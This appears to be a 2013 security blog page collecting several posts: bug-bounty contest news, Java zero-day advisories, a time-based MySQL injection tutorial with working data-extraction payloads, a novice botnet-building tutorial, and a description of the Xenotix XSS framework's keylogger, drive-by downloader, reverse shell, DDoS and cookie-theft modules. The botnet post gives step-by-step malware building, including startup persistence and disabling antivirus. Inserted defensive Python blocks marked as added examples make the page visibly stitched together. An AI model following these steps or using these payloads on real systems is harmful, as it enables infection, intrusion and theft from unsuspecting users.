    • Adobe Flash ($70,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)
    • Oracle Java ($20,000) plus the compromised laptop (estimated at $2,000) and 20,000 ZDI reward points (estimated at $10,000)


Google, on the other hand, is arranging its own competition, Pwnium 3, which focuses on vulnerabilities in Chrome OS and offers a more-than-generous $3.14159 million in total rewards. The target is a Samsung Series 5 550 Chromebook running the latest version of Chrome OS. To win, you must successfully exploit the browser or system of the device logged in as a guest or a user, or achieve a "compromise with device persistence - guest to guest with interim reboot, delivered via a webpage."


Our readers should take in notice to upgrade and update their systems with the latest versions of softwares to stay safe from cybercrimes and attacks.

Ethical hacking has been on the rise since bounty hunters tend to look for every possible way to attack a system to earn their much deserved prize money. Therefore, many International companies are encouraging hackers to join them in their pursuit for safe and secure softwares, programs, systems and the like.

Our own bounty hunter and ethical hacker Rafay Baloch has done so many times and has been rewarded with prize money from PayPal, job offers from big-shot companies and cell phones from Nokia. A proud people we are!

Rafay Baloch and his team members (including me) have made it our mission to spread awareness of ethical hacking and its advantages. Believe us, people, it is always better to do the right thing and get paid than to do the wrong one and get caught.

Let the hunting begin!

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Wednesday, March 6, 2013

Java Zero-Day Vulnerabilities Fixed By Oracle



We recently reported two Java zero-day vulnerabilities spotted in the wild by FireEye, now identified as CVE-2013-1493 and CVE-2013-0809. One of them (CVE-2013-1493) was being exploited to install McRat, a remote-access trojan, on users' machines and was therefore considered the more critical of the two.


These vulnerabilities were reported to the company and were expected to be fixed in April's Critical Patch Update, but active exploitation drove Oracle to roll out an emergency update. Oracle's advisory explains:

The company intended to include a fix for CVE-2013-1493 in the April 16, 2013 Critical Patch Update for Java SE (note that Oracle recently announced its intent to have an additional Java SE security release on this date in addition to those previously scheduled in June and October of 2013).  However, in light of the reports of active exploitation of CVE-2013-1493, and in order to help maintain the security posture of all Java SE users, Oracle decided to release a fix for this vulnerability and another closely related bug as soon as possible through this Security Alert.
Previously we suggested that users uninstall Java if they did not want to be preyed upon via McRat, but Oracle has now provided the better option of installing the new version of Java or letting it auto-update. Oracle also notes:
Desktop users should also be aware that Oracle has recently switched Java security settings to “high” by default.  This high security setting results in requiring users to expressly authorize the execution of applets which are either unsigned or are self-signed.  As a result, unsuspecting users visiting malicious web sites will be notified before an applet is run and will gain the ability to deny the execution of the potentially malicious applet.  In order to protect themselves, desktop users should only allow the execution of applets when they expect such applets and trust their origin.
We would request our readers to update their versions of Java as soon as possible to avoid being attacked. As they say, 'Prevention is better than cure'!
Cheers!
About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

MySQL Injection Time Based


We have already written a couple of posts on SQL injection techniques, such as "SQL Injection Union Based", "Blind SQL Injection" and, last but not least, "Common Problems Faced While Performing SQL Injection". How could the series miss the "Time Based SQL Injection" technique? @yappare has come up with another excellent post, which explains how this attack can be used to perform a wide variety of attacks. Over to @yappare.

Hey everyone! It's another post by me again, @yappare. As I promised Mr Rafay previously that I would write a tutorial for RHA on the MySQL time based technique, here's a simple tutorial on MySQL time based SQLi. Before that, as usual, here are some good references for those interested in SQLi:
http://technet.microsoft.com/en-us/library/cc512676.aspx

and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet

OK, back to our testing machine. In this example, I'll use the OWASP WebApps vulnerable machine, tested on the Peruggia application.

Let's go!

Previously, we already knew that the pic_id parameter is vulnerable to SQLi. So, let's say we want to use a time based attack on this vulnerable parameter; here is what we are going to do.


But first, do note that in MySQL, for time based SQLi, we are going to use the SLEEP() function. Each DBMS has a different function for this, but the steps are usually quite similar:
In MSSQL we use WAITFOR DELAY
In POSTGRES we use PG_DELAY()

and so on. Do check the pentestmonkey cheatsheet :D

Back to our testing. So let's check whether a time based attack can be done on the parameter or not.
Test it using this request:

pic_id=13 and sleep(5)--


As we can see from the image above, there's a difference between the requests. The first one is a normal request where the response time is 0 seconds, while in the second request I included the SLEEP() call, so the server waited 5 seconds before responding. From here we know that it can be attacked via the time based method as well.

Let's proceed to check the current user.
Here's the request we are going to use:

pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--


In this query, if the first character of the current user is equal to 'a', the server will sleep for 5 seconds before responding. If not, the server will respond in its normal response time. Then you should proceed to test with other characters.

From the image above, we can clearly see that for the first and second requests the server responded in 0 seconds, while for the third request the server delayed for 5 seconds. Why?
Because the first character of the current user is 'p', not 'a' or 'h'.
Then you can proceed to check its second character and so on.

pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--
pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--
and so on.

Now move on to table name guessing.

pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)


The first request is FALSE, because the server responded in 0 seconds; so no table named user exists.
In the second request the server delayed for 5 seconds, so a table named users does exist!

How about guessing the column name? It's easy.

pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)


See the image above? Still need any explanation? I bet you guys already understand it! :D

Now for the data extraction!

pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--

So, if the first character of the data in the right column_name of the right table_name = 'a', the server will delay for 5 seconds.
Then proceed to test the second, third character and so on.


The image shows that the username is admin. So is it correct? Let's double check it.


Yeah, it's correct.
That's all for now!
Thanks,
@yappare
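Two things a defender wants alongside the technique shown above, as an added example that is not part of @yappare's post nor of the Peruggia application: the vulnerable query pattern next to its parameterised form, and a small log check that flags the delay primitives used by the probes. The table schema, the /index.php path, the client IP and the log lines are all constructed for the demonstration; SQLite stands in for MySQL and has no SLEEP(), so the first part shows the appended SQL being evaluated through a boolean condition instead.

```python
import re
import sqlite3
from urllib.parse import parse_qsl, urlsplit

# Part 1: why the injection works and what the fix looks like.
# Constructed stand-in for the vulnerable lookup; the table and column names are
# assumptions, not Peruggia's real schema. SQLite is used so the block runs offline.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pictures (pic_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO pictures VALUES (?, ?)",
                     [(13, "first picture"), (14, "second picture")])
    return conn

def lookup_vulnerable(conn, pic_id):
    # The pattern the post exploits: the raw parameter is pasted into the
    # statement, so whatever follows the number becomes part of the WHERE clause.
    sql = "SELECT title FROM pictures WHERE pic_id=" + pic_id
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, pic_id):
    # Parameterised query: the driver binds pic_id as a value. A payload such as
    # "13 and 1=1" is then compared against the column as text and matches nothing,
    # and a SLEEP() inside it is never evaluated.
    sql = "SELECT title FROM pictures WHERE pic_id=?"
    return [row[0] for row in conn.execute(sql, (pic_id,))]

# Part 2: spotting the probes in web server logs.
# Delay primitives named in the post (MySQL SLEEP, MSSQL WAITFOR DELAY), plus
# MySQL BENCHMARK and PostgreSQL pg_sleep, which exist as well.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b",
                      re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def flag_time_based_requests(log_lines):
    """Return (client_ip, parameter, decoded_value) for every request whose query
    string carries a delay primitive. parse_qsl URL-decodes the values, so
    writing the spaces as %20 or + does not hide the keyword."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if DELAY_RE.search(value):
                hits.append((client_ip, name, value))
    return hits

# Constructed Common Log Format lines: a normal request followed by the two
# probes from the post (IP address and path are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Mar/2013:10:00:01 +0000] "GET /index.php?pic_id=13 HTTP/1.1" 200 512',
    '10.0.0.5 - - [21/Mar/2013:10:00:07 +0000] "GET /index.php?pic_id=13%20and%20sleep(5)-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [21/Mar/2013:10:00:14 +0000] '
    '"GET /index.php?pic_id=13+and+if(substring(user(),1,1)=%27a%27,SLEEP(5),1)-- HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, 13 and 1=1 ->", lookup_vulnerable(db, "13 and 1=1"))
    print("safe,       13 and 1=1 ->", lookup_safe(db, "13 and 1=1"))
    for ip, name, value in flag_time_based_requests(SAMPLE_LOG):
        print(f"{ip}: time based probe in parameter {name!r}: {value}")
```

The log check only flags the keyword, which is enough to catch the probes shown in the post; a response-time column in the log (for example Apache's %D) would additionally let you correlate the flagged requests with the 5 second delays they cause.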

Monday, March 4, 2013

How Hackers Make Botnets To Infect Systems [Part 2]


Hello RHA readers, we are back with How To Setup A Botnet [Tutorial For Noobs] [Part 2]. Those who haven't read the previous part should check the first part in order to understand part two, as it is the sequel of How To Setup A Botnet.

Part 1: How To Setup A Botnet [Tutorial For Noobs] [Part 1]

So in this part we will teach you how to set up a botnet.

Step 1:

Now, after hosting the server, extract the bot builder on your computer.
Download it from here: http://www.mediafire.com/?hb9ou6g50a620nb

Step 2:

After extracting, you'll find an application for bot building named 'VNBuilder'.
Run the application.
It will look as shown in the image:


Step 3:

Check the box shown below.

Step 4:

Now go to the 'Web Setting' tab. Type the website where you have set up your server in the ROOT WEBSITE URL column. Remember your website URL should look like www.yourwebsite.com, with no http:// at the start. Leave the port number as it is. Now type the folder in which your server is set up; it should look like /folder name/. Leave everything else as it is, as shown in the image:


 Step 5:

Now go to the Load Settings tab and check the 'INSTALL LOADER TO START UP' option, like in the image:




Step 6:

Proceed to the last tab, BUILD LOADER. If you want to change the icon of your virus, go to the top right under the Build Loader tab; you can add icons there for your virus, and additional icons are provided with the builder. You can even change the extension from .exe to .bat and a few others; at the bottom of the window you can find the option to change the extension. Finally, click Build.
The builder will ask where to save the file and under which name; provide the one you want.

Step 7:

You've successfully created the bot. Now, in order to check whether the bot is working or not, run it on your computer. Turn off your antivirus, as it will detect the virus. After running the virus, log in to the server you made in part one of this tutorial. If your virus was created successfully, your IP will appear in the server list with your computer name, like mine:
If your IP is appearing, then you have configured the botnet successfully. Congratulations.
Thanks for reading, Stay tuned with us for more tutorials!

About The Author


This article has been written by Fahad Awan, who has recently joined RHA's team. We wish him the best of luck and hope that he enjoys working for RHA.

Another Java Zero-Day Vulnerability Spotted In The Wild



So, you thought you were out of the woods with Java? Bad news. You aren't. Another Java zero-day vulnerability has been found in the wild by FireEye.

Java v1.6 and Java v1.7 Update 15 in browsers are being targeted this time around. The previously unknown and unpatched vulnerability is exploited through the browser to install a remote-access trojan named McRat.

McRat is a Windows trojan, therefore Windows users are prone to such an attack. It is not clear whether Mac and Linux users are at risk as well.

According to FireEye researchers:

We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to 'High' and do not execute any unknown Java applets outside of your organization.

If you are a Windows user and fear such an attack, we would suggest an uninstallation of Java because, as yet, there are no solutions to this problem.

The next security updates are scheduled for 16th April, but Oracle will be forced to push an emergency update in the light of current events.

Cheers!

About the Author:
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Sunday, March 3, 2013

Exploiting XSS Vulnerabilites With Xenotix




Introduction


Cross Site Scripting or XSS vulnerabilities have been reported and exploited since the 1990s. XSS is listed as the third vulnerability in the OWASP 2013 web application vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place on the client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potential of XSS vulnerabilities was not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered a high risk vulnerability. But later XSS tunneling and payload delivery showed us the potential of XSS vulnerabilities. Most of the large websites like Google, Facebook, Twitter, Microsoft and Amazon even now suffer from XSS bugs. That's a brief introduction to XSS.

Some threats due to XSS

XSS Tunneling: With an XSS tunnel a hacker can obtain the traffic between the victim and a webserver.
Client side code injection: A hacker can inject malicious code and execute it on the client side.
DOS: A hacker can perform DOS against a remote server or against the client itself.
Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.
Malware Spreading: A hacker can spread malware through a website which is vulnerable to XSS.
Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.
Defacing: Temporary or permanent defacement of the web application is possible.

What is Xenotix XSS Exploit Framework?



Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. This tool can inject code into webpages that are vulnerable to XSS. It is basically a payload list based XSS scanner and XSS exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both a manual mode and an automated, time sharing based test mode. The exploitation framework in the tool includes an XSS encoder, a victim side XSS keystroke logger, an executable drive-by downloader, an XSS reverse shell and an XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.

Features of Xenotix XSS Exploit Framework

Xenotix XSS Exploit Framework is divided into two modules:

1. Scanner Module

· Built in XSS Payloads
· HTML5 compatible Payload list
· XSS Auto mode Scanner
· XSS Multi-Parameter Scanner
· XSS Fuzzer

2. Exploitation Framework

· XSS Keylogger
· XSS Executable Drive-by downloader
· XSS Payload Encoder
· XSS Reverse Shell
· XSS DDoSer
· XSS Cookie Thief

1. Scanner Module




Built in Payload List

It has an inbuilt XSS payload list of over 500 XSS payloads, including HTML5 compatible XSS injection payloads. Most XSS filters are implemented using a string replace filter, the htmlentities filter or the htmlspecialchars filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.
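As an added illustration (not Xenotix code) of why a replace-based filter is weaker than output encoding: the first function stands in for the string replace filter mentioned above, the second is the htmlspecialchars-style approach applied to every dangerous character, and evaluate() runs both over a few constructed inputs, including a classic HTML5-era payload that contains no script tag at all. The sample strings and the markup check are constructed for the demonstration.

```python
import html
import re

def weak_filter(value):
    # Typical "string replace filter": removes one literal tag name, once per
    # occurrence, case-sensitively. It only knows about the string it was told.
    return value.replace("<script>", "").replace("</script>", "")

def encode_for_html(value):
    # htmlspecialchars-style output encoding: every & < > " ' becomes an entity,
    # so the browser can only ever render the value as text, whatever it contains.
    return html.escape(value, quote=True)

# A tag-looking sequence surviving into an HTML text context is what the
# browser would start parsing as markup; this is a deliberately simple check.
MARKUP_RE = re.compile(r"<[a-z!/]", re.IGNORECASE)

def still_contains_markup(rendered):
    return MARKUP_RE.search(rendered) is not None

# Constructed inputs, from ordinary text to the variants a blacklist misses.
SAMPLES = [
    "hello <b>world</b>",             # harmless-looking but still markup
    "<script>alert(1)</script>",      # the one string the weak filter knows
    "<SCRIPT>alert(1)</SCRIPT>",      # same thing, different case
    "<img src=x onerror=alert(1)>",   # no script tag involved at all
]

def evaluate(filter_fn):
    """True for each sample that still carries markup after filtering."""
    return [still_contains_markup(filter_fn(sample)) for sample in SAMPLES]

if __name__ == "__main__":
    print("weak_filter     :", evaluate(weak_filter))
    print("encode_for_html :", evaluate(encode_for_html))
```

The point of the comparison is that a blacklist has to anticipate every payload in a list like the one described above, while encoding the output for the HTML context it lands in does not need to know what the input is.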


The above chart shows the number of XSS payloads in different XSS scanning tools available on the market. Xenotix XSS Exploit Framework has the world's second largest XSS payload list after IBM AppScan Security, which has 700 million payloads.

XSS Scanner Module




XSS Multi-Parameter Scanner

The Multi-Parameter XSS Scanner comes in handy when you have multiple parameters to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don't need to test each parameter separately.

XSS Fuzzer

The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Pollution. With the Fuzzer, one can conduct out-of-the-box fuzzing to detect hidden vulnerabilities in a web application.


2. Exploitation Framework

XSS Keylogger


The tool includes an inbuilt victim side keylogger which is implemented using JavaScript and PHP. PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and sends them to a PHP file, which in turn writes the logs into a text file.


XSS Executable Drive-by Downloader

Java drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable on the victim's system without his knowledge or permission. You have to specify the URL of the malicious executable, then embed the drive-by webpage into an XSS vulnerable page and serve it to your victim. When the victim views the injected page, the Java applet client.jar accesses the command prompt and, with the help of the echo command, writes a script to a Visual Basic script file named winconfig.vbs in the temp directory (%temp%); cmd.exe then starts winconfig.vbs. winconfig.vbs downloads the malicious executable specified in the URL to the temp directory, renames it update.exe and finally executes it. The download and execution of the malicious executable happen without the knowledge or permission of the victim.





XSS Payload Encoder




The inbuilt encoder allows encoding into different forms to bypass various filters and web application firewalls. The encoder supports Base64 encoding, URL encoding, hex encoding, HTML character conversion, character code conversion and IP to dword, hex and octal conversions.


XSS Reverse Shell

An XSS reverse shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of the Java drive-by. The XSS vulnerable web application, exploited with the injectable scripts generated by XSS Reverse Shell, will initiate the drive-by download of a reverse TCP connecting shell when presented to a victim. After the drive-by download, the reverse shell is executed by the same method used in the Java drive-by.

The advantage of this method is that the reverse shell is downloaded and executed on the victim's system without his knowledge. But for the execution of the reverse shell, a UAC dialog will pop up requesting permission to run the executable. The tool has an inbuilt listener that listens for the reverse shell. It is designed in a user friendly manner: all you have to do is specify the reverse connection IP and port.

 

XSS DDoSer


With HTML5 comes great power. We harness the power of HTML5 to abuse Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack. WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to the opening or closing of a WebSocket. XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a browser behind the scenes; it can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it, by abusing CORS, the add-on creates numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross site requests, the browser at times refuses to send more requests to the same URL. However, this can easily be bypassed by making every request unique by adding a non-existent query-string parameter with changing values.



XSS Cookie Thief

It's the traditional cookie stealer, but a bit more advanced and with a real time cookie viewer. This module allows the pentester to create a cookie stealing POC.


Features for the Next Build

The current version of XSS Exploit Framework is based on Internet Explorer's webpage rendering engine, Trident. Since XSS behaves slightly differently in different web browsers, support for the Gecko (used by Mozilla Firefox) and WebKit (used by Chrome, Opera and Safari) rendering engines will be added in the next build. Support for XSS in POST parameters and XSS testing by modifying the headers will be included in the next build. An XSS proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable to XSS and DOM based XSS detection will be added in the next build.

Conclusion

XSS in a popular website is a high security threat. Xenotix XSS Exploit Framework can be used by security analysts to perform penetration tests on web applications against XSS vulnerabilities and to create POCs with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS scanners or XSS exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner and as an XSS exploitation framework. Bug bounty programs like the Google Vulnerability Reward Program, Facebook Bounty, PayPal bug bounty etc. are there. So go XSS hunting and grab your bounty!

About Ajin Abraham

Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He has published various whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India's biggest ethical hacking competition. His areas of interest include web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.